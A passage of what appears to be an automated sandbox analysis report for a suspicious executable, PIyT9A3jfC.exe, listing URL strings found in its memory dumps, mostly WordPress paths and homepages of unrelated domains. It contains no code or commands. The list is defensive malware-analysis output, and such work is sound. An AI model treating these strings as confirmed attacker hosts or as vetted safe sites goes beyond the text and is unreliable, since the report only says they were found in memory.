                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/wlwmanifest.xml
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F&#038;format=xml
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/wp/v2/pages/28
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/xmlrpc.php
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/xmlrpc.php?rsd
                  Source: PIyT9A3jfC.exe, 00000001.00000002.891190103.000000000449D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.817464123.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com/Z
                  Source: PIyT9A3jfC.exe, 00000001.00000002.891190103.000000000449D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.comm
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687770203.00000000013C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nelipak.nl/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nelipak.nl/j1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netcr.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netcr.com/a
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.643743042.000000000771B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nqks.com/Au
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.643743042.000000000771B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nqks.com/wu
                  Source: PIyT9A3jfC.exe, 00000001.00000002.891683595.00000000055BD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076B9000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com/(
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com/e
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com/h
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com/m
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com/yo
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.893998897.0000000007680000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olras.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000002.893998897.0000000007680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olras.com//
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olras.com/W
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora-ito.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.777742716.0000000007697000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora.ecnet.jp/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora.ecnet.jp/)s
                  Source: PIyT9A3jfC.exe, 00000001.00000003.777742716.0000000007697000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora.ecnet.jp/Ys0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otena.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otena.com/;
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otena.com/S
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ottospm.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ottospm.com/JH
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ottospm.com/xmlrpc.php
                  Source: PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.817464123.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702693462.0000000001445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.owsports.ca/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.owsports.ca/A
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076C3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.777742716.00000000076C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pb-games.co/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pb-games.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/
